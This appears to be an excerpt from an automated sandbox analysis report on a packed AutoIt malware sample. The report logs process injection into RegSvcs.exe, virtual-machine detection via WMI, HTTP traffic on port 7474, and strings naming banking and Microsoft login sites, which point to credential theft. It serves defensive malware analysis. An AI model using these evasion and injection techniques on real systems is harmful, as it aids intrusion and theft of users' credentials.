Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007DC590 push eax; retn 007Dh	1_2_007DC599
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F8B85 push ecx; ret	1_2_007F8B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073C5F63 pushfd ; iretd	3_2_073C5F69

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49711

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_007D4A35
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_008555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_008555FD

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007F33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_007F33C7

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

API/Special instruction interceptor: Address: 14F3224

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2201			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5768			Jump to behavior

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-100302

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

API coverage: 4.6 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00834696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00834696
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0083C9C7
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083C93C FindFirstFileW,FindClose,	1_2_0083C93C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0083F200
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0083F35D
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0083F65E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00833A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00833A2B
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00833D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00833D4E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0083BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0083BF27

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_007D4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: tmp53D6.tmp.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmp53D6.tmp.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: tmp53D6.tmp.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegSvcs.exe, 00000003.00000002.1480551725.000000000103F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMMf
Source: tmp53D6.tmp.3.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmp53D6.tmp.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: tmp53D6.tmp.3.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: tmp53D6.tmp.3.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmp53D6.tmp.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: tmp53D6.tmp.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmp53D6.tmp.3.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: tmp53D6.tmp.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: tmp53D6.tmp.3.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: tmp53D6.tmp.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: tmp53D6.tmp.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: tmp53D6.tmp.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmp53D6.tmp.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: tmp53D6.tmp.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: tmp53D6.tmp.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	API call chain: ExitProcess graph end node	graph_1-98701
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	API call chain: ExitProcess graph end node	graph_1-101691
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	API call chain: ExitProcess graph end node	graph_1-98767

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008441FD BlockInput,

1_2_008441FD

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_007D3B4C

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00805CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

1_2_00805CCC

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008EF090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_008EF090

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_014F34F0 mov eax, dword ptr fs:[00000030h]	1_2_014F34F0
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_014F3490 mov eax, dword ptr fs:[00000030h]	1_2_014F3490
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_014F1E70 mov eax, dword ptr fs:[00000030h]	1_2_014F1E70

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_008281F7

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FA364 SetUnhandledExceptionFilter,		1_2_007FA364
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_007FA395

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D5D008

Jump to behavior

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00828C93 LogonUserW,

1_2_00828C93

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_007D3B4C

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_007D4A35

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00834EC9 mouse_event,

1_2_00834EC9

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YPSvIjQCzd.exe"

Jump to behavior

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

1_2_008281F7

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00834C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00834C03

Source: YPSvIjQCzd.exe, 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YPSvIjQCzd.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007F886B cpuid

1_2_007F886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
